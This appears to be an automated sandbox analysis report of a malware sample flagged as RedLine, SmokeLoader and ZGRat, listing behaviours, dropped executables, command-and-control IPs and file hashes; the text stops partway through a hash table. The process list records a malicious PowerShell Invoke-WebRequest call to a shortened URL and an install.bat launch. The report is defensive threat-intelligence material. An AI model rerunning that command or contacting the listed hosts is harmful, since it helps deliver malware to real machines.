Analysis Overview
SHA256
a341a8574b9648e1d208bb0e35d3fa5caad87640cb34ed00b03c5348facb84ae
Threat Level: Known bad
The file 0x003600000001459a-619.dat was found to be: Known bad.
Malicious Activity Summary
RedLine
Detect ZGRat V1
SmokeLoader
ZGRat
Smokeloader family
RedLine payload
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Unsigned PE
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 21:36
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 21:36
Reported
2023-12-18 21:39
Platform
win7-20231215-en
Max time kernel
32s
Max time network
34s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1292 wrote to memory of 2864 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe |
| PID 1292 wrote to memory of 2864 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe |
| PID 1292 wrote to memory of 2864 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe |
| PID 1292 wrote to memory of 2864 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe |
| PID 1292 wrote to memory of 2728 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe |
| PID 1292 wrote to memory of 2728 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe |
| PID 1292 wrote to memory of 2728 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe |
| PID 1292 wrote to memory of 2728 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe
"C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe"
C:\Users\Admin\AppData\Local\Temp\9000.exe
C:\Users\Admin\AppData\Local\Temp\9000.exe
C:\Users\Admin\AppData\Local\Temp\AD22.exe
C:\Users\Admin\AppData\Local\Temp\AD22.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\B405.exe
C:\Users\Admin\AppData\Local\Temp\B405.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
Files
memory/1420-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1292-1-0x0000000002A70000-0x0000000002A86000-memory.dmp
memory/1420-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9000.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2864-14-0x0000000000230000-0x0000000000282000-memory.dmp
memory/2864-19-0x00000000746C0000-0x0000000074DAE000-memory.dmp
memory/2864-20-0x0000000005010000-0x0000000005050000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\AD22.exe
| MD5 | 72e456f99b606e5e86ce0a8bd39c46bd |
| SHA1 | 585367dccf03be12a3748cac9a831288bd490c31 |
| SHA256 | cc2ca8de27b57487825777912f2bc7ff37285b4b8899723d21238dab6ac026af |
| SHA512 | f17f80d54d6c0c82885cde046891c27582f605f55ecc4d6d0468a75f7f5aa3661424b784240c501499168fdbb8118738a7e5392447156fd9ea3537826a6c5cd1 |
C:\Users\Admin\AppData\Local\Temp\AD22.exe
| MD5 | 5af251c4fa9423a46274b5933768ec31 |
| SHA1 | 620951e3a1e8502098aff243f8bf2a1b87768417 |
| SHA256 | 486605ae1fcdc60fc4b561701f010ddf7e53cf11a5ee0848ed5f496123d20c78 |
| SHA512 | 275d221d25ede9ffccc33b0ab1b3c6350a27ace56cccab07d9a83746634e40808e1a4657a631dddd5bb9ee168d16986c4ba91c201c695948735229169565588c |
memory/2728-27-0x00000000746C0000-0x0000000074DAE000-memory.dmp
memory/2728-28-0x0000000000080000-0x0000000000E72000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 683c8ad48fa0d3e60e45cf77944d022b |
| SHA1 | 36e1a372c1ecdfb73d63792206b57ab508d427ea |
| SHA256 | 8c5c6d11cdffdcda679197f02ca1ea9650966c505449d06faa955fb834d56428 |
| SHA512 | e3e6fffa2c2b3a0a5b45308b20a055d077860098baf4dce835dd0c6ad4d8a9f527df123ef9cd1c0072d728b8168c877e6619073ec00c8fddf9656b7b4b6414ca |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 847628da554750c79ce520a3ce9048f6 |
| SHA1 | aad9b0bb3c30ce92c17fd50974e746e6057c940d |
| SHA256 | a960bb9343bfc7970c179f2f3edddcc613ac90ab735df2938e697db042af5057 |
| SHA512 | b6762270e000fff2eda1c9048f5868ded759188a1eab90113d3aaabfe42575266d1583d0f8b809070094dcd40fd0dd4189ac7ced1cbed0b0bb2d636f6f85039f |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
\Users\Admin\AppData\Local\Temp\nsyB127.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | be1f6b150429d1d0f0f1668d236497f4 |
| SHA1 | ee314e43bb4343849e0a3e4fba26a6df21ccc71a |
| SHA256 | b85b54e73eac06d61e11a25f58a5700cd6c2084f3aec32fac1052a37b2f73245 |
| SHA512 | 89756413dfe892f6ebdc731a6f2a62f6cd808286bc1b1534861384ebd2f0b7e4b603efd2a5134e21dfb3a58f07c99c93bbc07c7799f45f35e3d7b59c4e0bb2d4 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | c8e9aa1c1230ac49c0d20a7259715d3e |
| SHA1 | 92494f325288b9f5d364bd00d26d00e6bd8feca8 |
| SHA256 | 9e98a41bdb3ca6c7c1ced11dc778ba129b3943631a03ced17c65d2deb2954b0d |
| SHA512 | 91edfd07559a9ed53aadada1446fce2c28f55db482a3808f0f7f4abbf050628653475445b0b308d206cc933dd697de31da999107a8f725b029c65115a2defd64 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | d5c32e0d00e04d442634609fa7edfa21 |
| SHA1 | f4cc73d1938d17015ac5c4184369aaadbed6d5eb |
| SHA256 | 02d6086a5ff6bc11c423f091d037a7939b56db11cebe6786be85363e3f94b0ed |
| SHA512 | 700c3204c918091dbbdb4d84e7ccfb2dde3bb0cadc8de27b8dfce4ce4dd9ebd379357bacdcfe66133e233ed08409534982ce20dd5ce7edc5f25c276dd4a9d78b |
memory/2844-61-0x00000000026A0000-0x0000000002A98000-memory.dmp
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 249e96fe18063f8a71bce780bc9c091a |
| SHA1 | dbfa591b7516555b2ef1ffe83b4c7f5985bcecc1 |
| SHA256 | 76b9ddadd8bc59b6909efdb54b618b0f08c07f2519ef0cd48b4b57583a3cd063 |
| SHA512 | 8d474ec0400477d35f2072f5c928b4af98f1adb2ce528ae9bf723769538eb564639b281ca6f3ea2ef2e940c15f92416607d9e38be8f630e0b3f74ed8e383cfea |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 865269e2e219b2875b7f35512118f5ba |
| SHA1 | 177a9759318323782badcb467788fc060d493126 |
| SHA256 | 7a64ca7ff1c010cbc79ec0d7d2d7c04a54e17f9644772cb509ea1ad57250cf82 |
| SHA512 | a07af53a8e0314f36e642b981a31618a2a65f35378311983f47d8724f93de1e5955293c2a8e0aec5da3d3b4b27d2484c3338579b72cc8fe17268a51742da4640 |
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 3e5f0d26a3c0b737bc47d1ff06e58df8 |
| SHA1 | a5492088245b378dd31d52d20669fbce38a7e5f3 |
| SHA256 | 67680e643ce3138d31a483eabe7300d3f634c108348c35839d0c7ca98ad228f4 |
| SHA512 | 1d8c6e99a2893e14c1a5080776a0a8d80ea58cdd6db9da2050e01e15e53e8925906483216f9dbaef903e98d164fed41e20e5d897403a66579f07b97e184b01ac |
memory/1528-80-0x0000000000400000-0x0000000000418000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 21:36
Reported
2023-12-18 21:39
Platform
win10v2004-20231215-en
Max time kernel
43s
Max time network
91s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2622.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DBF.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3532 wrote to memory of 2696 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe |
| PID 3532 wrote to memory of 2696 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe |
| PID 3532 wrote to memory of 2696 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe |
| PID 3532 wrote to memory of 2660 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2622.exe |
| PID 3532 wrote to memory of 2660 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2622.exe |
| PID 3532 wrote to memory of 2660 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2622.exe |
| PID 3532 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DBF.exe |
| PID 3532 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DBF.exe |
| PID 3532 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DBF.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe
"C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe"
C:\Users\Admin\AppData\Local\Temp\FAB.exe
C:\Users\Admin\AppData\Local\Temp\FAB.exe
C:\Users\Admin\AppData\Local\Temp\2622.exe
C:\Users\Admin\AppData\Local\Temp\2622.exe
C:\Users\Admin\AppData\Local\Temp\4DBF.exe
C:\Users\Admin\AppData\Local\Temp\4DBF.exe
C:\Users\Admin\AppData\Local\Temp\5504.exe
C:\Users\Admin\AppData\Local\Temp\5504.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\5CA6.exe
C:\Users\Admin\AppData\Local\Temp\5CA6.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.196.233:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.196.217.52.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
Files
memory/4584-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3532-1-0x0000000003250000-0x0000000003266000-memory.dmp
memory/4584-3-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FAB.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2696-12-0x0000000000580000-0x00000000005D2000-memory.dmp
memory/2696-17-0x00000000748F0000-0x00000000750A0000-memory.dmp
memory/2696-18-0x0000000005290000-0x0000000005834000-memory.dmp
memory/2696-19-0x0000000004DE0000-0x0000000004E72000-memory.dmp
memory/2696-20-0x0000000005070000-0x0000000005080000-memory.dmp
memory/2696-21-0x0000000004F90000-0x0000000004F9A000-memory.dmp
memory/2696-22-0x00000000063F0000-0x0000000006A08000-memory.dmp
memory/2696-24-0x0000000007C70000-0x0000000007D7A000-memory.dmp
memory/2696-25-0x00000000062E0000-0x00000000062F2000-memory.dmp
memory/2696-26-0x0000000006340000-0x000000000637C000-memory.dmp
memory/2696-27-0x0000000006390000-0x00000000063DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2622.exe
| MD5 | d2eca114aa6f8790810c6ff1510bdfb1 |
| SHA1 | 04c46eebd653937aecb02d80a34ca5a981a0e274 |
| SHA256 | 3557399e00798cd0af103fbacce698ed945b29aaf3a10bee867e52a04ac641d9 |
| SHA512 | 0855358b05c61a744b9db814da7cecc9e27b2f76108bcd873313fbb5aecede11611cb723fa75de61113555f62f0000f53b68bda6e12a84c3b4c3315773278e00 |
C:\Users\Admin\AppData\Local\Temp\2622.exe
| MD5 | 6813fd5f7757e4e477f7db06eb1dddd7 |
| SHA1 | 035fe80a75f669a303d551925aa781a6c4e949d0 |
| SHA256 | a3099967182c096aae8f22bf181d62918bc29975148a531d2c72cc4041a7e87d |
| SHA512 | 35d80067178f7986b348fc0398333129d6cdc12535f2c5dd17566b01fc16fff5e934dd018fad3fe73362b23b58acdae26de229ef755a05535ea06838dd7fbba8 |
memory/2660-33-0x0000000000540000-0x00000000009DE000-memory.dmp
memory/2660-32-0x00000000748F0000-0x00000000750A0000-memory.dmp
memory/2660-34-0x0000000005570000-0x000000000560C000-memory.dmp
memory/2660-35-0x00000000054C0000-0x00000000054D0000-memory.dmp
memory/2696-36-0x00000000088A0000-0x0000000008906000-memory.dmp
memory/2696-37-0x0000000005070000-0x0000000005080000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4DBF.exe
| MD5 | 7ab6938c8677dbebff96d9e8fb0b4b54 |
| SHA1 | ac1ddf4fcbd265bf30fee39249728418dbcfe1cd |
| SHA256 | 2b44086eb3472748eac2b93e0eab69681c4938883b88604ca73dce2245ae1df8 |
| SHA512 | 420ce5edb937c953df0778e5cb32b1cb363a0c647af7c68486c65434282a12213554117ed50f6bf5ee049e9b94f7c424b0b74f66d2dbc315badf67d3464fb268 |
C:\Users\Admin\AppData\Local\Temp\4DBF.exe
| MD5 | 9e7a0d65a310e3fdacc65ef94db9ca9e |
| SHA1 | 6c11124773985901010babe464d87f961168baa0 |
| SHA256 | 0bde452f1331a08c945f1c9865f5d59b8bd0413274adf68a880607b75e357a9a |
| SHA512 | 08b8d0faf4596ceb63686bbf0a86b1a88ab0945d98f59021aa8156033a78c27c5329ef4a0778231494a504ca645a46e265f172444c88a1b05ab3aeb0a72400ff |
memory/2684-42-0x00000000748F0000-0x00000000750A0000-memory.dmp
memory/2684-43-0x0000000000ED0000-0x0000000001CC2000-memory.dmp
memory/2660-45-0x0000000005EB0000-0x0000000006078000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5504.exe
| MD5 | dc6fbf2cd9ad1f1f0ac200e9bec7ea3f |
| SHA1 | c3af9d82d270829784339331dea63f927400e0d4 |
| SHA256 | 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590 |
| SHA512 | 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
| MD5 | 60c9624e093baac4bef11ab4fc846111 |
| SHA1 | 07a25911c81e04608a0dc6fb065524a9da82dd65 |
| SHA256 | e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d |
| SHA512 | 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 9445be826cc1c194fe4364740ed979f9 |
